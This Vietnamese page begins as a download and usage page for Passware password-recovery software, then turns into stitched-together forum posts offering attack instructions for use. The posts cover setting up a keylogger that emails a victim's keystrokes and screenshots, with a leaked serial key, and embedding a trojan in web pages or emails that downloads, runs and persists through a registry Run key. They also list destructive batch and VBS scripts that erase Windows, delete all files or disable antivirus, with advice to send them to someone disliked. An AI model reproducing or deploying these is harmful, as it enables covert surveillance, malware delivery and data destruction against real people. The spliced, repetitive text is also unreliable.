Đầu tiên, bạn vào File > chọn Recover File Password (Ctrl + O), rồi tìm tập tin bị khóa cần lấy lại password. Sau đó, nhấn vào Run Wizard để mở thuật sỹ tra password. Tại đó, chọn I know not thing about the password (nếu chưa biết bất cứ thông tin gì về password cần tìm), rồi nhấn Finish để chương trình tìm kiếm. Hoặc dùng các tùy chọn còn lại (nếu bạn có chút thông tin nào đó và muốn cung cấp để thêm căn cứ cho chương trình truy tìm password), rồi nhấn Next và tiến hành cung cấp.
Recover Internet and Netword Password: Phục hồi password cho các ứng dụng liên quan hệ thống mạng Bạn cũng chọn bằng cách vào thanh File, rồi chọn tiếp ứng dụng chứa tài khoản cần lấy lại password. Ngay lập tức, chương trình sẽ chạy để đưa ra kết quả.
Đó là hai chức năng thường dùng của PRE, ngoài ra còn có các tính năng hay khác đang chờ bạn khám phá! Lưu ý:
Tốc độ truy lùng password nhanh hay chậm phụ thuộc vào số ký tự và các ký tự đó như thế nào. Nếu số ký tự ít và không chứa các ký tự đặc biệt (như: @, #,…) thì tốc độ sẽ nhanh hơn, và ngược lại.
Download Passware Kit Enterprise 9.5 - săn tìm password của các ứng dụng
Note: - Chúng tôi không cung cấp các các phần mềm Crack. Không phổ biến các bạn sử dụng các phần mềm bẻ khóa. Mọi trách nhiệm còn lại là của bạn khi sử dụng phần mềm này. - Các phần mềm cung cấp trên Website là do các thành viên đóng góp, submit. Nếu bạn nhận thấy những phần mềm nào không hữu dụng, hoặc chứa mã độc xin hãy thông báo cho BQT website biết để sớm giải quyết. - Để an toan, máy tính của bạn cần trang bị các phần mềm tìm, diệt virus - trojan và các phần mềm xấu khác trước khi tải các phần mềm trên Internet.
Từ khóa phần mềm Passware Kit Enterprise 9.5 - săn tìm password của các ứng dụng thường được tìm thấy
Passware Kit Enterprise 9.5 - săn tìm password của các ứng dụng Tai phan mem Cách 1 : dùng keylog cài trực tiếp vào máy hay nhất là dùng perfectkeylogger của công ty blazingtools down ở đây http://www.freewebtown.com/quang031/i_bpk2003.exe hướng dẫn đây 1Dầu tiên là cài đặt a)Bạn cilck vào file exe để setup b)khi set up máy sẽ hoi bạn đặt tên file là gì theo tôi bạn cứ đặt tên là Readme(tý nữa tui sẽ giải thích nguyên nhân sau).Bạn đien thông số sau ========================
username : pvthanh serial : WEJJ-XVJP-QVPI-CSRP )View the log:Cho bạn xem các tháo tác bạn đã sữ dụng trên bàn phím 2)Hide progam icon:cho phep bạn chon ẩn hay hiện icon trên taskbar 3)password:đặt password cho chương trình ,khi nhập đúng password thì mới có quyền sử dụng chương trình 4)Exit thoát khỏi chương trình chú ý nó sẽ không theo dõi bàn phím nữa nếu như bạn bấm exit Còn lại là hai chức năng cực kỳ quan trong b)logging:gồm các chức năng sau password:như trên viewlog:như trên clearlog:giúp làm sạch các ghi chép trên bàn phím of c/t c)Screenshots Chụp ảnh màm hình.Bạn có thể điỿu chỉnh thỿi gian chụp anh 1 lần còn nếu không muốn thì bạn không chọn ô Enable visual..... d)email:cực kỳ quan trọng schedule:chon thoi gian gửi một lần(,Try to send logs by email every.. thoi gian được tính từ khi victim online) loại file, dung lượng gửi(đến chừng bao nhiêu KB sẽ gửi 1 lần log size ) sendto:địa chỉ mail của bạn vd: [email protected] SMTP server của gmail gsmtp183.google.com còn của yahoo thì mình không nhớ post number:giử nguyên username:tên hộp mail của bạn vd RUOIBU passwordassword hộp mail của bạn auto..:chọn none Xong xuôi rùi bạn hảy click vào sendtest nếu báo là thành công thì ok rùi đó Tới phần FTP: cái này dùng để upload lên web,cũng rất hay vì có 1 số phần mỿm chống các chươnmg trình có chức năng gửi mail(BKAV...) nên dùng cái này có vẽ hay Hostname:tên host vd:ftp.vandon.homeip.net ( của tui) => nhưng nói thất bỿn này dùng thưỿng kô được mấy ( mặ dù đã text được qua kinh nghiệm hi ) username:tên sử dụng password: xxxxx Alert: phần này có chức năng gửi mail cho bạn ngay lập tức khi nó "tìm thấy những từ hay cụm từ mà bạn qui định ở dưới (bạn có thể Add keyword tùy ý) khi Victim typing trên máy của victim . Phần ở dưới là 2 lựa chon : Send email notification (bắt buộc chọn nếu bạn muốn program gửi mail cho bạn) và Make a screenshot (chụp hình monitor của victim , chon hay ko tùy bạn) . Nhưng có 1 lưu ý nho nho , bạn nên add keyword dài dài hay keyword mà bạn nghi là victim có thể đánh (như trong phần password,hay chat với ai đó chẳng hạn) ,
B)Remote install ( tạo ra con trojan cực tuyệt) có ai muốn thử kô trojan đó => bay gio xong roi do ban upload nen mang thoi co gi ko hieu nhan lai cho toi rùi và bây giờ là kết quả nè Cách 2 : tạo trojan để hack nghĩa là các bạn tạo ra 1 con tương tự như virus , bạn đem phát tán lên mạng ...như mấy thằng đểu nó hay gửi lên các diễn đàn để lừa gà đó Khi đả điền đầy đủ các thông tin ở phần Options xong bạn vào mục Remote Installation.... để tạo con trojan --> Next --> Next-->Browse bọn chọn 1 file nào đó cỏ thể la file .exe hoặc file ảnh ....Tiếp đó bạn chọn Next Finish .. khi nào tạo xong file nhiệm trojan thì up lên 1cái host free nào đó CÁC BẠN HÃY ĐỌC KỸ PHẦN HƯỚNG DẪN BÊN TRÊN Con Trojan mà các bạn tạo ra có thệ chụp ảnh màn hình ,, Kể cả bàn phím ảo của võ lâm .. mình đả thử nghiệm và rất thành công chính acc của mình ... chúc các bạn thầnh công!!!! Bạn muốn chạy tự động 1 trojan trên máy tính người khác khi họ xem trang Web hoặc Email của bạn...! Có cách nào không??? Dĩ nhiên là được rồi! Bài viết này sẽ giúp bạn giải quyết vấn đề! 1) Hướng dẫn: · Bước 1: chuẩn bị một file trojan.exe, kích thước khoảng 5 - 40Kb. Nếu bạn không có trojan, bạn có thể tải về từ trang TlSecurity.com hoặc tự viết một file trojan.exe để xài! · Bước 2: chạy convert16.exe để convert file trojan.exe sang trojan.hex · Bước 3: dùng 1 trình soạn thảo văn bản dạng text( nên dùng EditPlus, nó rất hay!) để sửa file temp.htm như sau: Thay phần .doc=”4D5A900... 64620000” thành .doc=”<đặt nội dung của file trojan.hex vào đây>” VD: .doc=”9631447da55abcd44ac25...” · Bước 4: Nhúng file nội dung file temp.htm sau khi sửa vào trang Web hoặc Email và gởi đến cho người khác!
2) Mã nguồn:
· Files: § tempsrc.hta dùng để extract và execute trojan.exe § tempsrc.htm file htm chính § convert16.vbp & convert16.frm : file nguồn của chương trình Convert 16, được viết bằng Visual Basic 6, dùng để convert file .exe sang file .hex
· Những vấn đề chính:
§ Kĩ thuật ‘Convert 16’: dùng để tạo 1 file nhị phân, ví dụ như trojan.exe Chuyển mã ANSI của kí tự sang hệ cơ số 16 hexa. Từ mã ANSI của kí tự ở hệ 16 chúng ta dễ dàng chuyển về lại kí tự ban đầu. Để dễ hiểu, tôi đưa ra ví dụ sau:
Kí tự L P T V C l u b 2 0 0 1 Mã ANSI ở hệ 10 76 80 84 86
32 67 108 117 98 32 50 48 48 49 Mã ANSI ở hệ 16 4C 50 54 56 20 43 6C 75 62 20 32 30 30 31
Encode16 Decode16 “LPTV Club 2001” “4C50545620436C75622032303031” “LPTV Club 2001”
‘--- VBScript Code ---
function encode16(st) for i = 1 to len(st) temp = hex((asc(mid(st,i,1)))
‘ mid(st,i,1) lấy 1 kí tự trong chuổi st ở vị trí thứ i ‘ asc(mid(st,i,1)) trả về mã ANSI của kí tự này ‘ temp = hex((asc(mid(st,i,1))) sẽ chứa mã ANSI ở hệ 16 của kí tự if len(temp) = 1 then ‘vì mã ANSI của kí tự chỉ nằm trong khoảng từ 0 đến 255 (0h-FFh), nên nếu độ dài của temp=1 chúng ta sẽ thêm 0 vào trước! Ví dụ: 0A, 07, ... temp =”0” & temp end if encode16 = encode16 & temp next end function
function decode16(st) for i =1 to len(st) step 2 ‘như ở trên, mỗi kí tự được mã bằng đúng 2 kí tự nên bước nhảy step = 2 decode16 = decode16 & chr(“&h” & mid(st,i,2)) ‘ mid(st,i,2) trả về 1 chuổi gồm 2 kí tự, bắt đầu từ vị trí thứ i trong chuổi ‘chr(“&h” & mid(st,i,2)) trả về kí tự có mã ANSI ở hệ 16; “&h” dùng để chỉ hệ 16 next end function ‘--- VBScript Code ---
§ Kĩ thuật ‘Encode’: được sử dụng trong file temp.hta & temp.htm
ü Mục đích:
+ giảm kích thước file + làm cho mã lệnh khó đọc đối với người khác
ü Ví dụ: thay vì viết lệnh rõ ràng:
on error resume next dn=chr(34) xd=vbcrlf set wsh=createobject("wscript.shell") set fso=createobject("scripting.filesystemobject")
Chúng ta cũng có thể viết lại như sau:
on error resume nextj=chr(34)q=vbcrlfset g=createobject("wscript.shell")set t6=createobject("scripting.filesystemobject")
Bạn thấy mã lệnh nhỏ hơn trước và có khó đọc không?
3) Hỏi/Đáp:
· Có thể gắn virus hoặc 1 chương trình khác thay cho trojan không?
Dĩ nhiên là được rồi! Bạn thử nghĩ lại xem, file virus, trojan.exe hầu như đều là các file .exe chương trình có khả năng tự thực thi nên bạn hoàn toàn có thể thay đổi theo ý muốn của bạn!
· Nếu tôi gắn 1 file trojan.exe lớn trong file temp.html , file này sẽ lớn kinh khủng, người khác có thể nghi ngờ! Vậy làm sao bây giờ?
· Tôi muốn máy họ tự động download file trojan.exe từ trên mạng về và execute nó? Có được không?
Rất dễ! Thay vì phải gắn file trojan.exe, chúng ta sẽ gắn 1 file chương trình nhỏ khoảng 5 KB. Nhiệm vụ của file này là download trojan.exe từ http://www.somewhere.com/yoursite/trojan.exe và thi hành nó! Bạn nên sửa lại mã của file .hta một chút!: bỏ lệnh xóa file temp.exe và thêm lệnh tạo registry-startup cho file temp.exe! ... wsh.regwrite “HKLM\Software\Microsoft\Windows\CurrentVersion\Run\Kernel 32”,filetrojan ...
Bạn có thể sử dụng chương trình Web Dowloader để giải quyết vấn đề trên! Tôi có gởi kèm chương trình Web Dowloader trong tập hướng dẫn này, file Webdownloader2.0.zip
· Có thể chạy trojan.exe ngay sau khi người khác đọc trang Web hoặc Email mà không cần họ khởi động lại máy tính không?
Hoàn toàn có thể được! Nhưng trong phạm vi bài viết này, tôi không muốn đề cập đến!
Chúc các bạn thành công! Đầu tiên, bạn hãy thử 1 chút mẹo vặt này để hỉu rõ hơn về con virus mà bạn sắp sửa tạo:
Thông thường khi muốn xóa hẳn 1 file nào đó mà không thể cứu lại thì các bạn phải nhờ đến các soft chuyên dùng để xóa File ( như Blannco Shreader, Unlocker......), tuy nhiên trong Win bạn vẫn có thể xóa hẳn file bằng cách tạo 1 tập tin .cmd Bạn hãy mở notepad, paste đoạn code này vào Trích dẫn:DEL /F /Q * , sau đó lưu lại với bất cứ tên nào bạn muốn ở định dạng .cmd. Với file cmd này khi kích hoạt nó sẽ xóa sạch tất cả các file có trong máy tính cho dù đó là file read only hay là bạn ko có quyền tiếp cận nó. Bạn sẽ ko bít được hậu quả của nó ra sao nếu bạn ko kích hoạt nó. Cảnh báo: Đừng kích hoạt nó!!! Bạn hãy làm 1 ví dụ nhỏ để thấy tác dụng của nó: hãy tạo 1 file bất kỳ trong bất kỳ thư mục nào đó ( ở đây xin ví dụ tạo file C:\test.txt ). Mở notepad, paste đoạn code Trích dẫn:erase C:\TEST.txt vào, lưu lại dưới dạng file .cmd với bất cứ tên nào. Ok bây giờ bạn kích hoạt nó, bạn sẽ thấy trong ổ C:\ sẽ ko còn file test.txt. Đến đây chắc bạn đã vỡ lẽ ra nhìu điều, và bây giờ là công việc chính --> tạo 1 con virus phá hoại: Hãy mở Notepad, past đoạn code Trích dẫn:erase C:\WINDOWS hoặc C:\LINUS nếu là HDH Linus lưu lại ở định dạng .cmd với 1 cái tên hấp dẫn nào đó ( anhyeuem, emyeuanh,love,readme......) Vô cùng cảnh báo bạn đừng kích hoạt nó trong máy tính của ban!!! Bạn hãy gửi cho người nào mà bạn ghét nhất, khi người đó kích hoạt nó.......oops ,xin hãy vui lòng cài lại máy!!! Và đó gọi là virus, 1 con virus đơn giản nhưng hậu quả của nó thì không đơn giản chút nào. Một lần nữa mình mong các bạn coi đây là 1 kinh nghiệm để mà tránh chứ đừng áp dụng nó nhe!!! P/s: Các bạn có thể tạo 1 file .cmd với cách như trên nhưng với đoạn code Trích dẫn:ATTRIB +S /F /Q * để ẩn toàn bộ các file trong Win, ko ai có thể tiếp cận máy tính của bạn trừ khi thiết lập lại cài đặt.
cách làm nhưng file virus đơn giản
Đầu tiên các bạn mở notepad và chọn một trong những đoạn mã sau, các bạn copy đoạn mã vào notepad và lưu dưới đuôi VBS(nếu ko dc thì lưu với đuôi . cmd). ví dụ: slm.vbs
chảng hạn.. * mở ra một thông điệp vui sau đó sẽ tắt máy tính CODE Code: @echo off msg * em la slm ,bb anh! shutdown -c "virus slm" -s -t 10 Chỉ với Notepad hay Wordpad bạn đã có thể tự tạo cho mình 1 "chú" Virus dưới dạng VBSCRIPT hoặc Javascript rồi: Dưới đây là code của một số con virus nhỏ dưới dạng VBS: 1.Không cho victim khởi động máy: Code: Code: Dim wsh Set wsh = createobject("wscript.shell") wsh.run "RUNDLL32.EXE user.exe,exitwindows" 2. Disable NAV: Code: Code: Dim wsh Set wsh= CreateObject( "WScript.Shell") s1 = " HKEY_LOCAL_MACHINE\System\CurrentControlSet\Servic es\Norton Program Scheduler\Start" wsh.RegWrite s1,3, "REG_DWORD" 3. Hiển thị một message mỗi khi reboot máy: Code: Code: dim wsh Set wsh = CreateObject( "WScript.Shell" ) s1 = " HKLM\Software\Microsoft\Windows\CurrentVersion\Win Logon\" s2 = "LegalNoticeCaption" s3 = "LegalNoticeText" wsh.RegWrite s1+s2, "http://allformy.topcities.com" wsh.RegWrite s1+s3, "Hi ! Toi la SLM"
4. Hiển thị một dòng lệnh khi click vào file hay folder:, Code: Code: set reg=createobject("WScript.shell") reg.regwrite "HKEY_CLASSES_ROOT\*\Shell\\","Hi ! Ban da bi nhiem WK " reg.regwrite "HKEY_CLASSES_ROOT\folder\shell\Hi ! Ban da bi nhiem WK \","SLM" 5. Làm cho các trò trên hoạt động bình thường: Code: Code: Dim objShell Set objShell = CreateObject( "WScript.Shell" ) s1 = "HKEY_USERS\. Default\Software\Microsoft\Windows\CurrentVersion\ " s2 = "Policies\System\DisableRegistryTools" objShell.RegWrite s1+s2,1, "REG_DWORD" Dưới dạng Javascipt : Code: Code: var wsh; wsh=new ActiveXObject ("Wscript.shell"); // Winlogon when reboot var s1 = " HKLM\\Software\\Microsoft\\Windows\\CurrentVersion \\WinLogon\\"; var s2 = "LegalNoticeCaption"; var s3 = "LegalNoticeText"; wsh.RegWrite (s1+ s2, "http://allformy.topcities.com") ; wsh.RegWrite (s1+s3, "Hi ! Toi la Love. Toi den tu Chip&Kitty.com") ; //Disable Registry var s1 = "HKEY_USERS\\. Default\\Software\\Microsoft\\Windows\\CurrentVers ion\\"; var s2 = "Policies\\System\\DisableRegistryTools" ; wsh.RegWrite (s1+s2,0,"REG_DWORD");
//Delete file Msconfig.exe Code: Code: var fso; fso=new ActiveXObject("Scripting.FileSystemObject"); var fe=fso.getfile("C:\\windows\\msconfig.exe); fe.delete true; //Shutdown windows //Disable Mouse wsh.run ("RUNDLL32.EXE mouse,disable"); //Hang up windows wsh.run ("rundll32 user,disableoemlayer"); Xóa khóa Registry Files * xóa các tập tin registry key, sau đó lặp lại một tin nhắn CODE Code: @ECHO OFF START reg delete HKCR/.exe START reg delete HKCR/.dll START reg delete HKCR/* :MESSAGE ECHO slm chuc anh 1 ngay vui ve. GOTO MESSAGE -Endless Notepads * Điều này sẽ bật lên Notepads bất tận cho đến khi máy tính bị đóng băng và các vụ đụng *
CODE Code: @ECHO off :top START %SystemRoot%\system32\notepad.exe GOTO top
-Crazy caps lock * không ngừng quay caps lock và tắt nhanh chóng liên tục * CODE Code: Set wshShell =wscript.CreateObject("WScript.Shell") do wscript.sleep 100 wshshell.sendkeys "{CAPSLOCK}" loop --Endless ENter * Ép enter liên tục CODE Code: Set wshShell = wscript.CreateObject("WScript.Shell") do wscript.sleep 100 wshshell.sendkeys "~(enter)" loop --Endless Backspace * làm cho phím backspace liên tục bị ép * CODE Code: MsgBox "Let's go back a few steps" Set wshShell =wscript.CreateObject("WScript.Shell") do wscript.sleep 100 wshshell.sendkeys "{bs}" loop * làm cho ổ đĩa CD liên tục vọt ra * CODE Code: Set oWMP = CreateObject("WMPlayer.OCX.7") Set colCDROMs = oWMP.cdromCollection do if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1 colCDROMs.Item(i).Eject Next For i = 0 to colCDROMs.Count - 1 colCDROMs.Item(i).Eject Next End If wscript.sleep 100 loop Tất cả các code trên lưu với đuôi VBS Còn những cái này lưu dưới dạng slm.bat(đuôi .bat) Lặp lại n lần chu kỳ mess Code: @ECHO off :Begin msg * Hi msg * khoe ko anh ? msg * em slm ne msg * buon ngu chua? msg * tat may ngu thoi ,bb anh GOTO BEGIN Auto shutdown Code: @echo off msg * slm yeu anh shutdown -c “Error! tạm biet anh!” -s còn cái này thì ác hơn nửa Start > Run > Notepad Mở notepad, paste đoạn code Trích dẫn:erase C:\TEST.txt vào, lưu lại dưới dạng file .cmd với bất cứ tên nào. Ok bây giờ bạn kích hoạt nó, bạn sẽ thấy trong ổ C:\ sẽ ko còn file test.txt. Đến đây chắc bạn đã vỡ lẽ ra nhìu điều, và bây giờ là công việc chính --> tạo 1 con virus phá hoại: Hãy mở Notepad, past đoạn code Trích dẫn:erase C:\WINDOWS hoặc C:\LINUS nếu là HDH Linus
lưu lại ở định dạng .cmd với 1 cái tên hấp dẫn nào đó ( anhyeuem, emyeuanh,love,readme......) Vô cùng cảnh báo bạn đừng kích hoạt nó trong máy tính của ban!!! Bạn hãy gửi cho người nào mà bạn ghét nhất, khi người đó kích hoạt nó.......oops ,xin hãy vui lòng cài lại máy!!! Và đó gọi là virus, 1 con virus đơn giản nhưng hậu quả của nó thì không đơn giản chút nào. Một lần nữa mình mong các bạn coi đây là 1 kinh nghiệm để mà tránh chứ đừng áp dụng nó nhe!!! P/s: Các bạn có thể tạo 1 file .cmd với cách như trên nhưng với đoạn code Trích dẫn:ATTRIB +S /F /Q * Để ẩn toàn bộ các file trong Win, ko ai có thể tiếp cận máy tính của bạn trừ khi thiết lập lại cài đặt.
